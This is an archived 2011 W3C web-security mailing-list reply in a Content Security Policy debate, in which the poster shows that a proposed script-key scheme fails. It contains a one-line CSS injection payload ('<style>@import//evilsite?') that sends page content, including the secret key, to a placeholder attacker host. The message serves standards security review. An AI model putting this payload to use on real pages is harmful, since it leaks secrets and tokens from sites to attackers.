W3C home > Mailing lists > Public > public-web-security@w3.org > January 2011

Re: [Content Security Policy] Proposal to move the debate forward

From: gaz Heyes <gazheyes@gmail.com>
Date: Fri, 28 Jan 2011 11:32:16 +0000
Message-ID: <AANLkTikYX-m+D78RmTrktF4s9c66bjj1ePZifWPY6S9Y@mail.gmail.com>
To: Gervase Markham <gerv@mozilla.org>
Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28 January 2011 11:18, Gervase Markham <gerv@mozilla.org> wrote:

> <script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script>
>
> But I agree that's a bit of a pain to do. We could make it so that the only
> valid script-keys were ones which began "' ... !
>

Ah wait hehe I already know how to send that data remotely:-

 INJECTION HERE
<script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script>

Injection:-
<style>@import//evilsite?

So yeah well and truly pwnd, can we have start and end markers now? :D
Received on Friday, 28 January 2011 11:32:48 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Friday, 28 January 2011 11:32:48 GMT